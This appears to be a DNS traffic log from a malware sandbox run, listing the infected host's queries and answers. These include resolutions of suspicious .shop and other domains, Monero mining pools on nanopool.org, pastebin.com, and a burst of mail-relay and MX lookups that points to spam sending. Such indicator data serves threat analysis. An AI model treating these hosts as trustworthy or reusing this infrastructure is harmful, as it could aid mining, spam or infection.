Feb 21, 2024 00:26:22.896260977 CET	192.168.2.6	1.1.1.1	0x3f1d	Standard query (0)	relay.oulohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.896440029 CET	192.168.2.6	1.1.1.1	0xbdf9	Standard query (0)	relay.smhotmaillang.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.896687984 CET	192.168.2.6	1.1.1.1	0xeff3	Standard query (0)	relay.schupp-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.938385010 CET	192.168.2.6	1.1.1.1	0xed28	Standard query (0)	relay.tux4hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.938555002 CET	192.168.2.6	1.1.1.1	0x1e45	Standard query (0)	relay.igs-ruelzheim.rp.lo-net2.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.942118883 CET	192.168.2.6	1.1.1.1	0xe842	Standard query (0)	relay.ufer-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.942317963 CET	192.168.2.6	1.1.1.1	0x3552	Standard query (0)	relay.morr-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.982213020 CET	192.168.2.6	1.1.1.1	0xea9d	Standard query (0)	relay.utlohotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:22.982372999 CET	192.168.2.6	1.1.1.1	0xad49	Standard query (0)	relay.homehotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.010550976 CET	192.168.2.6	1.1.1.1	0x4597	Standard query (0)	cfgteam-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.026204109 CET	192.168.2.6	1.1.1.1	0x6e2a	Standard query (0)	relay.spd-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.026349068 CET	192.168.2.6	1.1.1.1	0xa909	Standard query (0)	markoren-no.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.026489973 CET	192.168.2.6	1.1.1.1	0xa998	Standard query (0)	glazingbt-com01i.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.044343948 CET	192.168.2.6	1.1.1.1	0x9ef2	Standard query (0)	relay.farma-aps.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.044657946 CET	192.168.2.6	1.1.1.1	0x8f69	Standard query (0)	relay.undercover-bietigheim.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.044800043 CET	192.168.2.6	1.1.1.1	0xeb65	Standard query (0)	relay.generika-apotheke-hotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.048643112 CET	192.168.2.6	1.1.1.1	0x49bd	Standard query (0)	mx4.netregistry.net	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.049060106 CET	192.168.2.6	1.1.1.1	0x56fd	Standard query (0)	relay.dancenight-express.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.097529888 CET	192.168.2.6	1.1.1.1	0x41e1	Standard query (0)	relay.att.in	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.140280008 CET	192.168.2.6	1.1.1.1	0x5c85	Standard query (0)	mailgate.outlook.fr.sg	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.288408041 CET	192.168.2.6	1.1.1.1	0xd606	Standard query (0)	relay.x-erfolgsteam.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.288568020 CET	192.168.2.6	1.1.1.1	0x901	Standard query (0)	relay.jalds.org	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.378417015 CET	192.168.2.6	1.1.1.1	0x44cf	Standard query (0)	relay.ptotonmail.ch	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.538883924 CET	192.168.2.6	1.1.1.1	0x3bd5	Standard query (0)	relay.esafrica.co.zw	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.630125999 CET	192.168.2.6	1.1.1.1	0xa057	Standard query (0)	relay.gamma.ocm.ne.jp	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.694152117 CET	192.168.2.6	1.1.1.1	0x1f0a	Standard query (0)	ftp.ksv-schwimmen.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.721534967 CET	192.168.2.6	1.1.1.1	0x96ef	Standard query (0)	relay.newhotmail.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.724739075 CET	192.168.2.6	1.1.1.1	0x86bb	Standard query (0)	relay.gothic-concerts.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.727621078 CET	192.168.2.6	1.1.1.1	0x3249	Standard query (0)	relay.fos-elektronik.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.738970041 CET	192.168.2.6	1.1.1.1	0x3d91	Standard query (0)	relay.hotmail.fr.ar	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.761018991 CET	192.168.2.6	1.1.1.1	0xe5f2	Standard query (0)	relay.joaz.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.814191103 CET	192.168.2.6	1.1.1.1	0x99c7	Standard query (0)	ftp.d-brinkmann.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.814326048 CET	192.168.2.6	1.1.1.1	0x6d09	Standard query (0)	ftp.creativ-moebelwerkstaetten.de	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:23.886744022 CET	192.168.2.6	1.1.1.1	0xffce	Standard query (0)	mailgate.att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:24.886519909 CET	192.168.2.6	1.1.1.1	0xffce	Standard query (0)	mailgate.att.co.id	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:24.987924099 CET	192.168.2.6	1.1.1.1	0x11bf	Standard query (0)	blauthlaw-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:24.988214016 CET	192.168.2.6	1.1.1.1	0xe8be	Standard query (0)	gmcocorp-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:25.884490013 CET	192.168.2.6	1.1.1.1	0xffce	Standard query (0)	mailgate.att.co.id	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 21, 2024 00:22:18.052612066 CET	1.1.1.1	192.168.2.6	0x5310	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 21, 2024 00:22:18.052612066 CET	1.1.1.1	192.168.2.6	0x5310	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:23.390254021 CET	1.1.1.1	192.168.2.6	0xc173	No error (0)	selebration17io.io		91.215.85.120	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:36.582400084 CET	1.1.1.1	192.168.2.6	0x6271	No error (0)	isotrimorphicnongrasse.shop		104.21.33.54	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:36.582400084 CET	1.1.1.1	192.168.2.6	0x6271	No error (0)	isotrimorphicnongrasse.shop		172.67.189.12	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:38.416331053 CET	1.1.1.1	192.168.2.6	0x124c	No error (0)	resergvearyinitiani.shop		104.21.94.2	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:38.416331053 CET	1.1.1.1	192.168.2.6	0x124c	No error (0)	resergvearyinitiani.shop		172.67.217.100	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470395088 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		186.147.159.149	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470395088 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		175.120.254.9	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470395088 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		190.218.66.151	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470395088 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470395088 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		187.204.68.217	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470395088 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		169.148.81.80	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470395088 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		109.175.29.39	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470395088 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470395088 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470395088 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470448017 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		186.147.159.149	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470448017 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		175.120.254.9	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470448017 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		190.218.66.151	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470448017 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470448017 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		187.204.68.217	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470448017 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		169.148.81.80	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470448017 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		109.175.29.39	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470448017 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470448017 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470448017 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470484972 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		186.147.159.149	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470484972 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		175.120.254.9	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470484972 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		190.218.66.151	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470484972 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470484972 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		187.204.68.217	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470484972 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		169.148.81.80	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470484972 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		109.175.29.39	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470484972 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470484972 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		123.140.161.243	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:43.470484972 CET	1.1.1.1	192.168.2.6	0x1569	No error (0)	trmpc.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:46.097898960 CET	1.1.1.1	192.168.2.6	0x8aa9	No error (0)	mobile.sunaviat.com		172.67.221.35	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:22:46.097898960 CET	1.1.1.1	192.168.2.6	0x8aa9	No error (0)	mobile.sunaviat.com		104.21.45.242	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708129883 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708129883 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708129883 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708129883 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708129883 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708129883 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.40.39.251	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708129883 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		187.211.34.223	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708129883 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708129883 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		201.119.134.214	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708129883 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		183.100.39.16	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708190918 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708190918 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708190918 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708190918 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708190918 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708190918 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.40.39.251	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708190918 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		187.211.34.223	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708190918 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708190918 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		201.119.134.214	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708190918 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		183.100.39.16	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708230019 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708230019 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708230019 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708230019 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708230019 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708230019 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		211.40.39.251	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708230019 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		187.211.34.223	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708230019 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708230019 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		201.119.134.214	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:16.708230019 CET	1.1.1.1	192.168.2.6	0x42e4	No error (0)	sjyey.com		183.100.39.16	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:19.346642971 CET	1.1.1.1	192.168.2.6	0x1695	No error (0)	windowsupdatebg.s.llnwi.net		69.164.46.128	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:19.346642971 CET	1.1.1.1	192.168.2.6	0x1695	No error (0)	windowsupdatebg.s.llnwi.net		69.164.46.0	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:27.319510937 CET	1.1.1.1	192.168.2.6	0x5141	No error (0)	wearethebestin2024.com		198.252.102.119	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:29.702343941 CET	1.1.1.1	192.168.2.6	0x684b	No error (0)	xmr-eu2.nanopool.org		51.195.43.17	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:29.702343941 CET	1.1.1.1	192.168.2.6	0x684b	No error (0)	xmr-eu2.nanopool.org		51.15.61.114	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:29.702343941 CET	1.1.1.1	192.168.2.6	0x684b	No error (0)	xmr-eu2.nanopool.org		51.15.89.13	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:29.702343941 CET	1.1.1.1	192.168.2.6	0x684b	No error (0)	xmr-eu2.nanopool.org		51.68.137.186	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:29.702343941 CET	1.1.1.1	192.168.2.6	0x684b	No error (0)	xmr-eu2.nanopool.org		163.172.171.111	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:29.702343941 CET	1.1.1.1	192.168.2.6	0x684b	No error (0)	xmr-eu2.nanopool.org		51.210.150.92	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:29.702343941 CET	1.1.1.1	192.168.2.6	0x684b	No error (0)	xmr-eu2.nanopool.org		51.195.138.197	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:30.901525021 CET	1.1.1.1	192.168.2.6	0x5825	No error (0)	pastebin.com		172.67.34.170	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:30.901525021 CET	1.1.1.1	192.168.2.6	0x5825	No error (0)	pastebin.com		104.20.68.143	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:30.901525021 CET	1.1.1.1	192.168.2.6	0x5825	No error (0)	pastebin.com		104.20.67.143	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		51.15.65.182	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		162.19.224.121	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		212.47.253.124	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		51.89.23.91	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		146.59.154.106	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		54.37.232.103	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		51.15.58.224	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		51.15.193.130	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		141.94.23.83	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		54.37.137.114	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:23:31.852972031 CET	1.1.1.1	192.168.2.6	0xeb30	No error (0)	xmr-eu1.nanopool.org		163.172.154.142	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:24:59.806113005 CET	91.211.247.248	192.168.2.6	0x4b05	No error (0)	bvstlyb.com		185.196.8.22	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403570890 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403570890 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403570890 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403570890 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403570890 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.40.39.251	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403570890 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		187.211.34.223	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403570890 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403570890 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		201.119.134.214	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403570890 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		183.100.39.16	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403570890 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403594017 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403594017 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403594017 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403594017 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403594017 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.40.39.251	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403594017 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		187.211.34.223	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403594017 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403594017 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		201.119.134.214	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403594017 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		183.100.39.16	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403594017 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403789043 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		175.119.10.231	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403789043 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.171.233.126	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403789043 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		186.13.17.220	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403789043 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.119.84.111	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403789043 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.40.39.251	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403789043 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		187.211.34.223	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403789043 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		196.188.169.138	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403789043 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		201.119.134.214	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403789043 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		183.100.39.16	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:25:56.403789043 CET	1.1.1.1	192.168.2.6	0x96d7	No error (0)	sjyey.com		211.181.24.133	A (IP address)	IN (0x0001)	false
Feb 21, 2024 00:26:01.279810905 CET	1.1.1.1	192.168.2.6	0x5929	Name error (3)	heinzerlinghotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.281588078 CET	1.1.1.1	192.168.2.6	0x6c55	Name error (3)	hotmailhome.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.283615112 CET	1.1.1.1	192.168.2.6	0x5d9	Name error (3)	rubypink.co.uk	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.285865068 CET	1.1.1.1	192.168.2.6	0x6f2c	Name error (3)	hotmailjoy.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.287025928 CET	1.1.1.1	192.168.2.6	0x48d	Name error (3)	hotmail.fryahoo.fr	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.289074898 CET	1.1.1.1	192.168.2.6	0xa84c	Name error (3)	hotmail-topmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.290903091 CET	1.1.1.1	192.168.2.6	0xa528	Name error (3)	newhotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.296061039 CET	1.1.1.1	192.168.2.6	0xb08d	Name error (3)	dancenight-express.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.297297001 CET	1.1.1.1	192.168.2.6	0x9cc1	Name error (3)	imao.ml	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.302633047 CET	1.1.1.1	192.168.2.6	0xdc1	Name error (3)	zube-hotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.307337046 CET	1.1.1.1	192.168.2.6	0x54d2	Name error (3)	spd-hotmail.de	none	none	MX (Mail exchange)	IN (0x0001)	false
Feb 21, 2024 00:26:01.314508915 CET	1.1.1.1	192.168.2.6	0x76dd	Name error (3)	kvapilova.net	none	none	MX (Mail exchange)	IN (0x0001)	false
